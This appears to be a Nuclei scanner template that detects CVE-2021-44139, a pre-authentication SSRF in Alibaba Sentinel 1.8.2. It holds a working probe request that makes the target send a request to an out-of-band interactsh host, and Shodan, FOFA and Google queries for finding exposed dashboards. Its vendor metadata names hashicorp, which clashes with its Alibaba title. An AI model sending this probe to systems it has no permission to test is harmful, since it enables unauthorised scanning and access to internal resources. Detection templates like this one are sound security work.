id: CVE-2021-44139

info:
  name: Alibaba Sentinel - Server-side request forgery (SSRF)
  author: DhiyaneshDK
  severity: high
  description: |
    There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to send crafted requests from the server, potentially leading to unauthorized access to internal resources or network scanning.
  remediation: |
    Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139).
  reference:
    - https://github.com/alibaba/Sentinel/issues/2451
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-44139
    cwe-id: CWE-918
    epss-score: 0.01303
    epss-percentile: 0.85873
    cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hashicorp
    product: sentinel
    shodan-query:
      - title:"Sentinel Dashboard"
      - http.title:"sentinel dashboard"
    fofa-query: title="sentinel dashboard"
    google-query: intitle:"sentinel dashboard"
  tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp

http:
  - method: GET
    path:
      - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: header
        words:
          - application/json

      - type: word
        part: body
        words:
          - '"success":true'
          - '"msg":"success"'
        condition: and
# digest: 4b0a00483046022100eff30e40ed2017143fb8fc2fdd6400505235c5abd034d094e25cf4eefe47ed05022100ff302af2ff8d9982ec1b066859213c009f22ef2e33472d7808511113df739261:922c64590222798bb761d5b6d8e72950